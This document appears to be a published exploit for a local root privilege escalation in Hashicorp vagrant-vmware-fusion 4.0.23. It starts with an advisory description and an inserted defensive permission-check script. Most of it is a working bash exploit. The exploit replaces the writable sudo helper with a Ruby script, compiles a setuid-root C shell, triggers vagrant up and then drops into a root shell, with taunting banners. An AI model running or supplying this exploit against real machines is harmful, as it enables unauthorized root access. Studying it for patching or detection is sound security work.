Hashicorp_vagrant-vmware-fusion_4.0.23_local_root_es

Hashicorp vagrant-vmware-fusion 4.0.23 and earlier contain a local root privilege escalation vulnerability. vagrant-vmware-fusion installs an encrypted ruby "sudo helper" script together with four wrappers for different architectures in the directory "~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin":
vagrant_vmware_desktop_sudo_helper                 
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64

When vagrant starts, the wrapper matching the current system is launched and runs the encrypted "sudo helper" script as root.

In older versions, the wrapper could be invoked directly with an unprivileged system "ruby", which would execute an arbitrary ruby script from the current directory. As of version 4.0.22 the caller is checked, and if the script was not invoked by vagrant, execution is refused.

That protection still leaves a hole: the wrapper runs the "sudo helper" script as root, but the "sudo helper" itself is not root-owned and read-only. An attacker can overwrite it with a malicious ruby script, and when vagrant next starts, the overwritten script is what runs as root.
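The defensive side of the flaw described above is a simple ownership and permission audit of the helper that the setuid wrapper executes as root. The following script is an added example, not part of the original advisory or exploit; the plugin directory, the file names and the BSD `stat -f '%u %Mp%Lp'` format string are assumed.

```shell
#!/bin/sh
# Added defensive check (not part of the original advisory or exploit).
# The wrapper runs vagrant_vmware_desktop_sudo_helper as root, so the helper
# must be owned by root and writable by nobody else; anything less lets a
# local user replace the script that root will execute.

# Print "uid mode" for a path. GNU stat (-c) is tried first; the BSD/macOS
# format string is assumed to produce the same "uid 4755" shape.
file_owner_mode() {
  stat -c '%u %a' "$1" 2>/dev/null || stat -f '%u %Mp%Lp' "$1"
}

# classify_helper UID MODE: "ok" only for a root-owned file whose group and
# other permission bits carry no write access. Pure string logic, so it runs
# the same under sh and bash and can be tested without real files.
classify_helper() {
  owner=$1
  perm=${2#"${2%???}"}          # last three octal digits: user group other
  grp=${perm#?}; grp=${grp%?}
  oth=${perm#??}
  status=ok
  [ "$owner" = 0 ] || status=vulnerable
  case "$grp$oth" in *[2367]*) status=vulnerable ;; esac   # write bit set
  echo "$status"
}

# scan_plugin_dir DIR: report the helper script and every wrapper found under
# DIR (normally ~/.vagrant.d). Returns 1 if the helper itself is vulnerable.
scan_plugin_dir() {
  dir=$1; rc=0
  for f in $(find "$dir" -type f -name 'vagrant_vmware_desktop_sudo_helper*' 2>/dev/null); do
    set -- $(file_owner_mode "$f")
    case "$f" in *_wrapper_*) kind=wrapper ;; *) kind=helper ;; esac
    verdict=$(classify_helper "$1" "$2")
    echo "$kind $f uid=$1 mode=$2 $verdict"
    [ "$kind" = helper ] && [ "$verdict" = vulnerable ] && rc=1
  done
  return $rc
}

# Usage: sh check_vagrant_helper.sh ~/.vagrant.d
if [ $# -gt 0 ]; then
  scan_plugin_dir "$1"
fi
```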
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw                                                        *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo

vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"

if [ "$vuln_bin" == "" ] ; then
  echo "Vulnerable binary not found."
  exit 1
fi

if [ -e "$target" ] ; then
  echo "Exploit payload already present."
  $target
  exit
fi

box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`

if [ "$box" == "" ] ; then
  echo "No vmware_fusion boxes found locally, we will have to download one."
  echo
  echo "This will take a few minutes."
  echo
  box="bento/ubuntu-16.04"
fi

dir=`dirname "$vuln_bin"`

cd "$dir"

if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
  mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi

cat > $target.c << EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
  return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c

cat > vagrant_vmware_desktop_sudo_helper << EOF
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF

chmod 755 vagrant_vmware_desktop_sudo_helper

cat > vagrantfile << EOF
Vagrant.configure('2') do |config|
  config.vm.box = '$box'
end
EOF

vagrant up 2>/dev/null &

while :
do
  r=`ls -la $target |grep -- '-rwsr-xr-x  1 root  wheel'`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.2
done

killall -9 vagrant

echo
echo "Sorry Hashicorp.. still fail :P"
echo

sleep 1
cd
$target
